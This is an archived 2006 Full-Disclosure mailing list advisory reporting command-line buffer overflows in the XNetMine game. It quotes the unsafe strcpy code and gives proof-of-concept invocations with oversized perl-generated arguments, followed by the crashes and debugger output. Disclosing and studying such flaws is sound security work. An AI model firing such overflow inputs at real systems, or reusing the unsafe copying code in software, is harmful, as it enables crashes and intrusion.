lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Wed, 18 Oct 2006 13:18:51 +0200
From: Federico Fazzi <federico@...istici.org>
To: vulnwatch@...nwatch.org,  full-disclosure@...ts.grok.org.uk
Subject: XNetMine (no version) multiple buffer overflow.

//

Vendor: Martin Bauer
Software: http://ibiblio.org/pub/Linux/games/multiplayer/XNetMine.tgz

*Vulnerable code:*
-- 
line: 672/676

  if (strncmp("-PortNumber",argv[t+1],11)==0)
 { char text[500];
   strcpy(text,argv[t+1]);
   strcpy(Port,&text[11]);
 }
-- 
line: 677/682

 if (strncmp("-Name",argv[t+1],5)==0)
 {
   char text[500];
   strcpy(text,argv[t+1]);
   strcpy(User,&text[5]);
 }
-- 
line: 683/688

  if (strncmp("-ServerName",argv[t+1],11)==0)
 {
   char text[500];
   strcpy(text,argv[t+1]);
   strcpy(ServerName,&text[11]);
 }
-- 

*Proof of concept:*
-- 
federico XNetMine % ./XNetMine -Server -PortNumber`perl -e 'print "A"x498'`
Server:1094795585  Client:0  PortNum:AAAAAAAAAAAAAAAAAAAAAAAAAAA(...) 
ServerName:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)"
Segmentation fault

federico XNetMine % ./XNetMine -Server -PortNumber31337 -Name`perl -e 'print "A"x504'`
Server:1  Client:0  PortNum:AAAAAAAAAAAAAAAAAAAAAAAA
Name:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)"  ServerName:""
Segmentation fault

federico XNetMine % ./XNetMine -Server -PortNumber31337 -Name31337 -ServerName`perl -e 'print "A"x504'`
Server:1  Client:0  PortNum:31337
Name:"31337"  ServerName:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)"
Segmentation fault
-- 

*Debug information:*
-- 
(gdb) p $eip
$1 = (void (*)()) 0x804a862 
(gdb) stepi
Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
SIGSEGV 0x0804a862 in main ()

-- federico
federico@...gs.it / http://defsol.plugs.it/

//

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ